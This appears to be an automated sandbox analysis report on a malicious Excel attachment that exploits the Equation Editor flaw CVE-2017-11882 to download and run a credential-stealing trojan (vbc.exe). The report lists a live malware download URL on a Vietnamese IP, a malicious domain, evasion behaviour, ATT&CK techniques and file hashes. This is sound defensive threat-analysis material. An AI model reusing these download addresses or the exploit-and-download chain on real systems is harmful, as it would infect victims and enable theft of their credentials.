    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E3AC0 push esp; ret 4_2_002E3AC9
    Source: initial sampleStatic PE information: section name: .text entropy: 7.92488075838
    Source: initial sampleStatic PE information: section name: .text entropy: 7.92488075838
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_036305BD
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-501
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2344Thread sleep time: -300000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exe TID: 1036Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-526
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-550
    Source: EQNEDT32.EXE, 00000002.00000002.956335622.00000000006F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: EQNEDT32.EXE, 00000002.00000002.956117653.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036306C7 mov edx, dword ptr fs:[00000030h]2_2_036306C7
    Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Scripting
    Path Interception11
    Process Injection
    111
    Masquerading
    OS Credential Dumping11
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts1
    Native API
    Boot or Logon Initialization Scripts1
    Extra Window Memory Injection
    1
    Disable or Modify Tools
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth33
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts22
    Exploitation for Client Execution
    Logon Script (Windows)Logon Script (Windows)21
    Virtualization/Sandbox Evasion
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS1
    Remote System Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Scripting
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information
    Cached Domain Credentials13
    System Information Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items2
    Software Packing
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
    Extra Window Memory Injection
    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    TedarikciSiparisi_83613 .xlsx34%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882
    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe41%ReversingLabsWin32.Trojan.Pwsx
    C:\Users\Public\vbc.exe41%ReversingLabsWin32.Trojan.Pwsx
    SourceDetectionScannerLabelLinkDownload
    4.2.vbc.exe.300000.0.unpack100%AviraHEUR/AGEN.1222351Download File
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://180.214.238.224/__cloud_for_file/vbc.exe95C:0%Avira URL Cloudsafe
    http://180.214.238.224/__cloud_for_file/vbc.exeu0%Avira URL Cloudsafe
    http://180.214.238.224/__cloud_for_file/vbc.exe100%Avira URL Cloudmalware
    http://180.214.238.224/__cloud_for_file/vbc.exeX0%Avira URL Cloudsafe
    http://180.214.238.224/__cloud_for_file/vbc.exehhC:0%Avira URL Cloudsafe
    www.mentalnayaarifmetika.online/ocgr/100%Avira URL Cloudmalware
    http://180.214.238.224/__cloud_for_file/vbc.exej0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://180.214.238.224/__cloud_for_file/vbc.exetrue
    • Avira URL Cloud: malware
    unknown
    www.mentalnayaarifmetika.online/ocgr/true
    • Avira URL Cloud: malware
    low
    NameSourceMaliciousAntivirus DetectionReputation
    http://180.214.238.224/__cloud_for_file/vbc.exe95C:EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://180.214.238.224/__cloud_for_file/vbc.exeuEQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://180.214.238.224/__cloud_for_file/vbc.exeXEQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://180.214.238.224/__cloud_for_file/vbc.exehhC:EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://180.214.238.224/__cloud_for_file/vbc.exejEQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    180.214.238.224
    unknownViet Nam
    135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:626598
    Start date and time: 14/05/202215:12:572022-05-14 15:12:57 +02:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 34s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:TedarikciSiparisi_83613 .xlsx
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.expl.evad.winXLSX@6/18@0/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 1% (good quality ratio 0.8%)
    • Quality average: 56.5%
    • Quality standard deviation: 32.2%
    HCA Information:
    • Successful, ratio: 99%
    • Number of executed functions: 33
    • Number of non-executed functions: 4
    Cookbook Comments:
    • Found application associated with file extension: .xlsx
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    TimeTypeDescription
    15:14:38API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
    15:14:43API Interceptor19x Sleep call for process: vbc.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    180.214.238.224ntrebare ES220062.xlsxGet hashmaliciousBrowse
    • 180.214.238.224/cloudfile/vbc.exe
    Comanda furnizorului-83613.xlsxGet hashmaliciousBrowse
    • 180.214.238.224/365space/vbc.exe
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNPAYMENT ADVICE.xlsxGet hashmaliciousBrowse
    • 103.99.0.198
    ntrebare ES220062.xlsxGet hashmaliciousBrowse
    • 180.214.238.224
    Quote.xlsxGet hashmaliciousBrowse
    • 103.145.255.4
    DHL_AWB_NO#907853880911.xlsxGet hashmaliciousBrowse
    • 103.149.12.106
    DRAFT SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
    • 103.99.0.198
    TransportLabel_6170453602.xlsxGet hashmaliciousBrowse
    • 103.149.13.182
    JVEdWgNqjA.ps1Get hashmaliciousBrowse
    • 103.133.105.61
    RFQ DOCUMENT.xlsxGet hashmaliciousBrowse
    • 180.214.236.4
    DRAFT SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
    • 103.99.0.198
    Comanda furnizorului-83613.xlsxGet hashmaliciousBrowse
    • 180.214.238.224
    OR17233976_00019489_20170619154218.xlsxGet hashmaliciousBrowse
    • 103.149.13.182
    POFOODEXPO2022.xlsxGet hashmaliciousBrowse
    • 103.149.12.43
    Quotation.xlsxGet hashmaliciousBrowse
    • 103.145.255.4
    NEW ORDER.xlsxGet hashmaliciousBrowse
    • 103.99.0.198
    Quotation Request From Wnsche Group GmbH Germany.xlsxGet hashmaliciousBrowse
    • 103.141.138.195
    pedido_639.xlsxGet hashmaliciousBrowse
    • 103.89.89.198
    PO050522_Airhawk.xlsxGet hashmaliciousBrowse
    • 103.149.12.43
    AWB_NO_9284730932.xlsxGet hashmaliciousBrowse
    • 103.147.185.53
    AWB_NO_9284730932.xlsxGet hashmaliciousBrowse
    • 103.147.185.53
    PR 00120181213.xlsxGet hashmaliciousBrowse
    • 103.89.89.198
    No context
    No context
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Category:downloaded
    Size (bytes):229376
    Entropy (8bit):7.903722597215708
    Encrypted:false
    SSDEEP:3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
    MD5:CE42FE431B88922AB59B6FD880CADCF6
    SHA1:652914D960DA1D37D270DB7F6E3B07C9D4B0E3A9
    SHA-256:4D8CC87942499042195CEC4FDB2FC5869D4BF98A1D827FD30FB74E82CF0FDC0F
    SHA-512:62B30A77CB2EF3491ABB3EC517CA966C4A9EAFA0F263118BA817A4CE87F8D3CDDC014BCE25FF268435B7F69605E6C14B8031B482F7CAF00E855964C618C609BA
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 41%
    Reputation:low
    IE Cache URL:http://180.214.238.224/__cloud_for_file/vbc.exe
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~b.................v...|.......... ........@.. ....................................`.................................p...W....................................P............................................... ............... ..H............text....u... ...v.................. ..`.reloc...............x..............@..B.rsrc................z..............@..@........................H........P...D...........=..............................................".(.....*....0...........(>...*..0..6.......+.&.(.....(.....(....:.....E.........-......&&..(.... y...(....%& ~...(....%&(.... ....(.... ....(....(.... ....(.... ....(....(.... ....(.... ....(....%&(.... ....(....%& ....(....(.......(....(....:.....E........&..(......(....9....&.(.......(....(....%&:.....E........&...(.......(........(....%&(....&. (....8.....$(....(....%.((.......%.,(....~?....%.0(......
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Reputation:high, very likely benign file
    Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Reputation:high, very likely benign file
    Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):1099960
    Entropy (8bit):2.0152800116954332
    Encrypted:false
    SSDEEP:3072:vXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:1ahIFdyiaT2qtXl
    MD5:BD4C089D8210CF4FCF74013334B2B925
    SHA1:1B98EDBC5386B92D82AC9B6174DEE1BC5411CC5E
    SHA-256:BC1A75F99B79C98350DA4BB5561EAC01186DACF8D64F3AE8D4822E1A028644D9
    SHA-512:5D7A6FB4798CC15FFDEF6F5282CD2A07034C4C8C92AFFF6199382F0FA72E9C8B46C625D3B0A7311AD5E3D1EBE27DBDD3E35166A758DC0DB8D974A722FB20B48C
    Malicious:false
    Reputation:high, very likely benign file
    Preview:....l...............C...........m>...&.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$...`....f.x.@h.%...<...............d...RQUQ............L.......$QUQ........ ...Id.x........ ............d.x............M....................Oq.....%...X...%...7...................{$..................C.a.l.i.b.r.i............................8.x........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
